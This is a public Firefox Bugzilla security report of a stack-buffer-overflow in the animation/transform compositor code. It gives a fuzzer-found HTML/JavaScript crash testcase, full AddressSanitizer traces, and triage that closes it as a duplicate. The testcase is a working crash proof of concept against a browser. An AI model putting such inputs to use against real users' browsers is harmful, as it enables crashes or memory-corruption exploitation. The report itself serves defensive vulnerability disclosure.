Closed Bug 1338774 Opened 7 years ago Closed 7 years ago

stack-buffer-overflow in nsDisplayTransform::GetResultingTransformMatrixInternal

Tracking

()

Status:

RESOLVED DUPLICATE of bug 1331704

Tracking Flags:

Tracking

Status

firefox54

---

affected

People

(Reporter: nils, Unassigned)

Details

Nils

Reporter

Description

•

7 years ago

The following testcase crashes the latest ASAN build of Firefox:

<script>
function start() {
        o36=document.createElement('iframe');
        o36.src='data:text/html,<div><div><div><div><div>xx';
        o36.addEventListener('load', fun1);
        try{while(document.removeChild(document.firstChild));}catch(e){};undefined;
        o39=document.implementation.createHTMLDocument();
        o39.body.appendChild(o36);
        document.appendChild(o39.documentElement);
}
function fun1() {
        o555=o36.contentDocument.getElementsByTagName('*')[5];
        o555.animate([{MozTransform: 'none',}],150);
        try{while(document.removeChild(document.firstChild));}catch(e){};undefined;
        o692=document.implementation.createHTMLDocument();
        o692.body.appendChild(o555);
        document.appendChild(o692.documentElement);
        location.reload();
}
</script>
<body onload="start()"></body>

=================================================================
==29813==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f4e3774d788 at pc 0x7f4e813a210a bp 0x7f4e3774d330 sp 0x7f4e3774d328
READ of size 8 at 0x7f4e3774d788 thread T28 (Compositor)
    #0 0x7f4e813a2109 in nsDisplayTransform::GetResultingTransformMatrixInternal(nsDisplayTransform::FrameTransformProperties const&, nsPoint const&, float, unsigned int, nsRect const*) /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:6408:81
    #1 0x7f4e813a05ad in nsDisplayTransform::GetResultingTransformMatrix(nsDisplayTransform::FrameTransformProperties const&, nsPoint const&, float, unsigned int, nsRect const*) /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:6353:10
    #2 0x7f4e7c1734f3 in ApplyAnimatedValue /home/worker/workspace/build/src/gfx/layers/composite/AsyncCompositionManager.cpp:615:9
    #3 0x7f4e7c1734f3 in operator() /home/worker/workspace/build/src/gfx/layers/composite/AsyncCompositionManager.cpp:650
    #4 0x7f4e7c1734f3 in _ZN7mozilla6layersL11ForEachNodeINS0_15ForwardIteratorEPNS0_5LayerEZNS0_L16SampleAnimationsES4_NS_9TimeStampEE3$_8ZNS0_11ForEachNodeIS2_S4_S6_EENS_8EnableIfIXsr6IsSameIDTclfp0_fp_EEvEE5valueEvE4TypeET0_RKT1_EUlS4_E_EENS8_IXaasr6IsSameIS9_vEE5valuesr6IsSameIDTclfp1_fp_EEvEE5valueEvE4TypeESC_SF_RKT2_ /home/worker/workspace/build/src/gfx/layers/TreeTraversal.h:137
    #5 0x7f4e7c1737a2 in _ZN7mozilla6layersL11ForEachNodeINS0_15ForwardIteratorEPNS0_5LayerEZNS0_L16SampleAnimationsES4_NS_9TimeStampEE3$_8ZNS0_11ForEachNodeIS2_S4_S6_EENS_8EnableIfIXsr6IsSameIDTclfp0_fp_EEvEE5valueEvE4TypeET0_RKT1_EUlS4_E_EENS8_IXaasr6IsSameIS9_vEE5valuesr6IsSameIDTclfp1_fp_EEvEE5valueEvE4TypeESC_SF_RKT2_ /home/worker/workspace/build/src/gfx/layers/TreeTraversal.h:142:5
    #6 0x7f4e7c1737a2 in _ZN7mozilla6layersL11ForEachNodeINS0_15ForwardIteratorEPNS0_5LayerEZNS0_L16SampleAnimationsES4_NS_9TimeStampEE3$_8ZNS0_11ForEachNodeIS2_S4_S6_EENS_8EnableIfIXsr6IsSameIDTclfp0_fp_EEvEE5valueEvE4TypeET0_RKT1_EUlS4_E_EENS8_IXaasr6IsSameIS9_vEE5valuesr6IsSameIDTclfp1_fp_EEvEE5valueEvE4TypeESC_SF_RKT2_ /home/worker/workspace/build/src/gfx/layers/TreeTraversal.h:142:5
    #7 0x7f4e7c1737a2 in _ZN7mozilla6layersL11ForEachNodeINS0_15ForwardIteratorEPNS0_5LayerEZNS0_L16SampleAnimationsES4_NS_9TimeStampEE3$_8ZNS0_11ForEachNodeIS2_S4_S6_EENS_8EnableIfIXsr6IsSameIDTclfp0_fp_EEvEE5valueEvE4TypeET0_RKT1_EUlS4_E_EENS8_IXaasr6IsSameIS9_vEE5valuesr6IsSameIDTclfp1_fp_EEvEE5valueEvE4TypeESC_SF_RKT2_ /home/worker/workspace/build/src/gfx/layers/TreeTraversal.h:142:5
    #8 0x7f4e7c13045f in ForEachNode<mozilla::layers::ForwardIterator, mozilla::layers::Layer *, (lambda at /home/worker/workspace/build/src/gfx/layers/composite/AsyncCompositionManager.cpp:638:7)> /home/worker/workspace/build/src/gfx/layers/TreeTraversal.h:165:3
    #9 0x7f4e7c13045f in SampleAnimations /home/worker/workspace/build/src/gfx/layers/composite/AsyncCompositionManager.cpp:636
    #10 0x7f4e7c13045f in mozilla::layers::AsyncCompositionManager::TransformShadowTree(mozilla::TimeStamp, mozilla::BaseTimeDuration<mozilla::TimeDurationValueCalculator>, mozilla::layers::AsyncCompositionManager::TransformsToSkip) /home/worker/workspace/build/src/gfx/layers/composite/AsyncCompositionManager.cpp:1309
    #11 0x7f4e7c1ce009 in mozilla::layers::CompositorBridgeParent::CompositeToTarget(mozilla::gfx::DrawTarget*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/layers/ipc/CompositorBridgeParent.cpp:982:27
    #12 0x7f4e7c1dc8d3 in ComposeToTarget /home/worker/workspace/build/src/gfx/layers/ipc/CompositorVsyncScheduler.cpp:344:3
    #13 0x7f4e7c1dc8d3 in mozilla::layers::CompositorVsyncScheduler::Composite(mozilla::TimeStamp) /home/worker/workspace/build/src/gfx/layers/ipc/CompositorVsyncScheduler.cpp:248
    #14 0x7f4e7c1f3dce in applyImpl<mozilla::layers::CompositorVsyncScheduler, void (mozilla::layers::CompositorVsyncScheduler::*)(mozilla::TimeStamp), StoreCopyPassByConstLRef<mozilla::TimeStamp> , 0> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:855:12
    #15 0x7f4e7c1f3dce in apply<mozilla::layers::CompositorVsyncScheduler, void (mozilla::layers::CompositorVsyncScheduler::*)(mozilla::TimeStamp)> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:861
    #16 0x7f4e7c1f3dce in mozilla::detail::RunnableMethodImpl<mozilla::layers::CompositorVsyncScheduler*, void (mozilla::layers::CompositorVsyncScheduler::*)(mozilla::TimeStamp), true, true, mozilla::TimeStamp>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:890
    #17 0x7f4e7ae78ee7 in RunTask /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:358:3
    #18 0x7f4e7ae78ee7 in DeferOrRunPendingTask /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:366
    #19 0x7f4e7ae78ee7 in MessageLoop::DoWork() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:441
    #20 0x7f4e7ae7af38 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/chromium/src/base/message_pump_default.cc:36:21
    #21 0x7f4e7ae764b8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #22 0x7f4e7ae764b8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #23 0x7f4e7ae764b8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #24 0x7f4e7ae959fa in base::Thread::ThreadMain() /home/worker/workspace/build/src/ipc/chromium/src/base/thread.cc:179:3
    #25 0x7f4e7ae849fc in ThreadFunc(void*) /home/worker/workspace/build/src/ipc/chromium/src/base/platform_thread_posix.cc:38:3
    #26 0x7f4e964ee6b9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76b9)
    #27 0x7f4e9557782c in clone /build/glibc-t3gR2i/glibc-2.23/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:109

Address 0x7f4e3774d788 is located in stack of thread T28 (Compositor) at offset 1096 in frame
    #0 0x7f4e813a05cf in nsDisplayTransform::GetResultingTransformMatrixInternal(nsDisplayTransform::FrameTransformProperties const&, nsPoint const&, float, unsigned int, nsRect const*) /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:6378

  This frame has 16 object(s):
    [32, 64) 'refBox'
    [96, 104) ''
    [128, 136) 'dummy'
    [160, 161) 'dummyBool'
    [176, 200) 'svgTransform'
    [240, 264) 'transformFromSVGParent'
    [304, 368) ''
    [400, 464) 'perspectiveMatrix'
    [496, 560) ''
    [592, 656) ''
    [688, 752) ''
    [784, 816) 'props'
    [848, 856) ''
    [880, 944) 'parent'
    [976, 984) ''
    [1008, 1072) '' <== Memory access at offset 1096 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
Thread T28 (Compositor) created by T0 here:
    #0 0x49b119 in __interceptor_pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:238:3
    #1 0x7f4e7ae8391c in CreateThread /home/worker/workspace/build/src/ipc/chromium/src/base/platform_thread_posix.cc:137:14
    #2 0x7f4e7ae8391c in PlatformThread::Create(unsigned long, PlatformThread::Delegate*, unsigned long*) /home/worker/workspace/build/src/ipc/chromium/src/base/platform_thread_posix.cc:148
    #3 0x7f4e7ae95451 in base::Thread::StartWithOptions(base::Thread::Options const&) /home/worker/workspace/build/src/ipc/chromium/src/base/thread.cc:98:8
    #4 0x7f4e7c1db1c8 in CreateCompositorThread /home/worker/workspace/build/src/gfx/layers/ipc/CompositorThread.cpp:102:8
    #5 0x7f4e7c1db1c8 in mozilla::layers::CompositorThreadHolder::CompositorThreadHolder() /home/worker/workspace/build/src/gfx/layers/ipc/CompositorThread.cpp:53
    #6 0x7f4e7c1db31a in mozilla::layers::CompositorThreadHolder::Start() /home/worker/workspace/build/src/gfx/layers/ipc/CompositorThread.cpp:118:33
    #7 0x7f4e7c33dc6f in InitLayersIPC /home/worker/workspace/build/src/gfx/thebes/gfxPlatform.cpp:946:9
    #8 0x7f4e7c33dc6f in gfxPlatform::Init() /home/worker/workspace/build/src/gfx/thebes/gfxPlatform.cpp:708
    #9 0x7f4e7c33b3a2 in gfxPlatform::GetPlatform() /home/worker/workspace/build/src/gfx/thebes/gfxPlatform.cpp:535:9
    #10 0x7f4e80259fd7 in mozilla::widget::GfxInfoBase::GetContentBackend(nsAString_internal&) /home/worker/workspace/build/src/widget/GfxInfoBase.cpp:1441:25
    #11 0x7f4e7a114551 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:115
    #12 0x7f4e7b8d60b7 in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2010:12
    #13 0x7f4e7b8d60b7 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1329
    #14 0x7f4e7b8d60b7 in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1296
    #15 0x7f4e7b8de337 in GetAttribute /home/worker/workspace/build/src/js/xpconnect/src/xpcprivate.h:1679:17
    #16 0x7f4e7b8de337 in XPC_WN_GetterSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1019
    #17 0x7f4e83f14e17 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:281:15
    #18 0x7f4e83f14e17 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:460
    #19 0x7f4e83f163ee in InternalCall /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
    #20 0x7f4e83f163ee in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:524
    #21 0x7f4e83f163ee in js::CallGetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:638
    #22 0x7f4e84e34f15 in CallGetter /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1806:16
    #23 0x7f4e84e34f15 in GetExistingProperty<js::AllowGC::CanGC> /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1854
    #24 0x7f4e84e34f15 in NativeGetPropertyInline<js::AllowGC::CanGC> /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2083
    #25 0x7f4e84e34f15 in js::NativeGetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2117
    #26 0x7f4e83eff656 in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1431:12
    #27 0x7f4e83eff656 in GetProperty /home/worker/workspace/build/src/js/src/jsobj.h:852
    #28 0x7f4e83eff656 in GetObjectElementOperation /home/worker/workspace/build/src/js/src/vm/Interpreter-inl.h:464
    #29 0x7f4e83eff656 in GetElementOperation /home/worker/workspace/build/src/js/src/vm/Interpreter-inl.h:569
    #30 0x7f4e83eff656 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2795
    #31 0x7f4e83ee02fa in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:406:12
    #32 0x7f4e83f150bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:478:15
    #33 0x7f4e83efb168 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:511:12
    #34 0x7f4e83efb168 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2957
    #35 0x7f4e83ee02fa in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:406:12
    #36 0x7f4e83f150bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:478:15
    #37 0x7f4e83efb168 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:511:12
    #38 0x7f4e83efb168 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2957
    #39 0x7f4e83ee02fa in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:406:12
    #40 0x7f4e83f150bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:478:15
    #41 0x7f4e83f15782 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:524:10
    #42 0x7f4e84b9b8dc in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #43 0x7f4e84b60fa4 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:351:14
    #44 0x7f4e84b7bb62 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:421:12
    #45 0x7f4e84b7e184 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:662:12
    #46 0x7f4e83f14ee0 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:281:15
    #47 0x7f4e83f14ee0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #48 0x7f4e83efb168 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:511:12
    #49 0x7f4e83efb168 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2957
    #50 0x7f4e83ee02fa in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:406:12
    #51 0x7f4e83f150bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:478:15
    #52 0x7f4e83f15782 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:524:10
    #53 0x7f4e848c77a3 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2785:12
    #54 0x7f4e7b8bb533 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedJSClass.cpp:1214:23
    #55 0x7f4e7a115c86 in PrepareAndDispatch /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcstubs_x86_64_linux.cpp:122:14
    #56 0x7f4e7a114c56 in SharedStub (/home/nils/fuzzer3/firefox/libxul.so+0x2076c56)
    #57 0x7f4e7a0a3b05 in NS_CreateServicesFromCategory(char const*, nsISupports*, char const*, char16_t const*) /home/worker/workspace/build/src/xpcom/components/nsCategoryManager.cpp:821:9
    #58 0x7f4e83aad3e6 in nsXREDirProvider::DoStartup() /home/worker/workspace/build/src/toolkit/xre/nsXREDirProvider.cpp:1167:11
    #59 0x7f4e83a88d70 in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4289:3
    #60 0x7f4e83a8b3e8 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4635:8
    #61 0x7f4e83a8c6ac in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4726:16
    #62 0x4dfebf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:234:10
    #63 0x4dfebf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:305
    #64 0x7f4e9549182f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291

SUMMARY: AddressSanitizer: stack-buffer-overflow /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:6408:81 in nsDisplayTransform::GetResultingTransformMatrixInternal(nsDisplayTransform::FrameTransformProperties const&, nsPoint const&, float, unsigned int, nsRect const*)
Shadow bytes around the buggy address:
  0x0fea46ee1aa0: 00 00 f2 f2 f2 f2 00 00 00 00 00 00 00 00 f2 f2
  0x0fea46ee1ab0: f2 f2 00 00 00 00 00 00 00 00 f2 f2 f2 f2 00 00
  0x0fea46ee1ac0: 00 00 00 00 00 00 f2 f2 f2 f2 00 00 00 00 f2 f2
  0x0fea46ee1ad0: f2 f2 00 f2 f2 f2 00 00 00 00 00 00 00 00 f2 f2
  0x0fea46ee1ae0: f2 f2 00 f2 f2 f2 00 00 00 00 00 00 00 00 f3 f3
=>0x0fea46ee1af0: f3[f3]f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fea46ee1b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fea46ee1b10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fea46ee1b20: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2
  0x0fea46ee1b30: 00 04 f2 f2 00 00 00 00 f2 f2 f2 f2 00 00 00 00
  0x0fea46ee1b40: 00 00 00 00 f2 f2 f2 f2 01 f2 00 00 f3 f3 f3 f3
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==29813==ABORTING

###!!! [Child][MessageChannel::SendAndWait] Error: Channel error: cannot send/recv

ASAN:DEADLYSIGNAL
=================================================================
==29913==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f8e8e44b3c1 bp 0x7f8e8a542610 sp 0x7f8e8a5425f0 T2)

###!!! [Child][MessageChannel] Error: (msgtype=0x8A0008,name=PLayerTransaction::Msg_ReleaseCompositable) Channel error: cannot send/recv


###!!! [Child][MessageChannel] Error: (msgtype=0x8A0007,name=PLayerTransaction::Msg_ReleaseLayer) Channel error: cannot send/recv


###!!! [Child][MessageChannel] Error: (msgtype=0x8A0008,name=PLayerTransaction::Msg_ReleaseCompositable) Channel error: cannot send/recv


###!!! [Child][MessageChannel] Error: (msgtype=0x8A0007,name=PLayerTransaction::Msg_ReleaseLayer) Channel error: cannot send/recv


###!!! [Child][MessageChannel] Error: (msgtype=0x8A0007,name=PLayerTransaction::Msg_ReleaseLayer) Channel error: cannot send/recv


###!!! [Child][MessageChannel] Error: (msgtype=0xDA0003,name=PTexture::Msg_Destroy) Channel error: cannot send/recv


###!!! [Child][MessageChannel] Error: (msgtype=0x8A0008,name=PLayerTransaction::Msg_ReleaseCompositable) Channel error: cannot send/recv


###!!! [Child][MessageChannel] Error: (msgtype=0x8A0007,name=PLayerTransaction::Msg_ReleaseLayer) Channel error: cannot send/recv


###!!! [Child][MessageChannel] Error: (msgtype=0x8A0007,name=PLayerTransaction::Msg_ReleaseLayer) Channel error: cannot send/recv


###!!! [Child][MessageChannel] Error: (msgtype=0x8A0007,name=PLayerTransaction::Msg_ReleaseLayer) Channel error: cannot send/recv

    #0 0x7f8e8e44b3c0 in mozilla::ipc::MessageChannel::OnChannelErrorFromLink() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2200:13
    #1 0x7f8e8e450bb3 in OnChannelError /home/worker/workspace/build/src/ipc/glue/MessageLink.cpp:367:5
    #2 0x7f8e8e450bb3 in non-virtual thunk to mozilla::ipc::ProcessLink::OnChannelError() /home/worker/workspace/build/src/ipc/glue/MessageLink.cpp:359
    #3 0x7f8e8e408ee6 in event_persist_closure /home/worker/workspace/build/src/ipc/chromium/src/third_party/libevent/event.c:1319:9
    #4 0x7f8e8e408ee6 in event_process_active_single_queue /home/worker/workspace/build/src/ipc/chromium/src/third_party/libevent/event.c:1363
    #5 0x7f8e8e408ee6 in event_process_active /home/worker/workspace/build/src/ipc/chromium/src/third_party/libevent/event.c:1438
    #6 0x7f8e8e408ee6 in event_base_loop /home/worker/workspace/build/src/ipc/chromium/src/third_party/libevent/event.c:1639
    #7 0x7f8e8e3c8fc1 in base::MessagePumpLibevent::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/chromium/src/base/message_pump_libevent.cc:373:7
    #8 0x7f8e8e3c34b8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #9 0x7f8e8e3c34b8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #10 0x7f8e8e3c34b8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #11 0x7f8e8e3e29fa in base::Thread::ThreadMain() /home/worker/workspace/build/src/ipc/chromium/src/base/thread.cc:179:3
    #12 0x7f8e8e3d19fc in ThreadFunc(void*) /home/worker/workspace/build/src/ipc/chromium/src/base/platform_thread_posix.cc:38:3
    #13 0x7f8ea9a3b6b9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76b9)
    #14 0x7f8ea8ac482c in clone /build/glibc-t3gR2i/glibc-2.23/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:109

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2200:13 in mozilla::ipc::MessageChannel::OnChannelErrorFromLink()
Thread T2 (Chrome_ChildThr) created by T0 (Web Content) here:
    #0 0x49b119 in __interceptor_pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:238:3
    #1 0x7f8e8e3d091c in CreateThread /home/worker/workspace/build/src/ipc/chromium/src/base/platform_thread_posix.cc:137:14
    #2 0x7f8e8e3d091c in PlatformThread::Create(unsigned long, PlatformThread::Delegate*, unsigned long*) /home/worker/workspace/build/src/ipc/chromium/src/base/platform_thread_posix.cc:148
    #3 0x7f8e8e3e2451 in base::Thread::StartWithOptions(base::Thread::Options const&) /home/worker/workspace/build/src/ipc/chromium/src/base/thread.cc:98:8
    #4 0x7f8e8e452c17 in mozilla::ipc::ProcessChild::ProcessChild(int) /home/worker/workspace/build/src/ipc/glue/ProcessChild.cpp:24:5
    #5 0x7f8e96fddea4 in ContentProcess /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/ContentProcess.h:31:7
    #6 0x7f8e96fddea4 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:629
    #7 0x4e00c6 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
    #8 0x4e00c6 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:284
    #9 0x7f8ea89de82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291

==29913==ABORTING

Andrew McCreight [:mccr8]

Comment 1

•

7 years ago

Looks like some more animation stuff.

URL: FlushPendingNotifications

Group: core-security → dom-core-security

Flags: needinfo?(bbirtles)

Hiroyuki Ikezoe (:hiro)

Comment 2

•

7 years ago

This looks another variant of bug 1331704.  I will check the test case in comment 0 on the latest ASAN build.

Flags: needinfo?(bbirtles) → needinfo?(hikezoe)

Hiroyuki Ikezoe (:hiro)

Comment 3

•

7 years ago

Confirmed.

Status: NEW → RESOLVED

Closed: 7 years ago

Flags: needinfo?(hikezoe)

Resolution: --- → DUPLICATE

Andrew McCreight [:mccr8]

Updated

•

7 years ago

URL: FlushPendingNotifications

Daniel Veditz [:dveditz]

Updated

•

5 years ago

Group: dom-core-security

You need to log in before you can comment on or make changes to this bug.

Bugzilla

Quick Search

stack-buffer-overflow in nsDisplayTransform::GetResultingTransformMatrixInternal

Categories

(Core :: DOM: Animation, defect)

Tracking

()

People

(Reporter: nils, Unassigned)

References

Details

Crash Data

Security

(public)

User Story

Description

Comment 1

Comment 2

Comment 3

Updated

Updated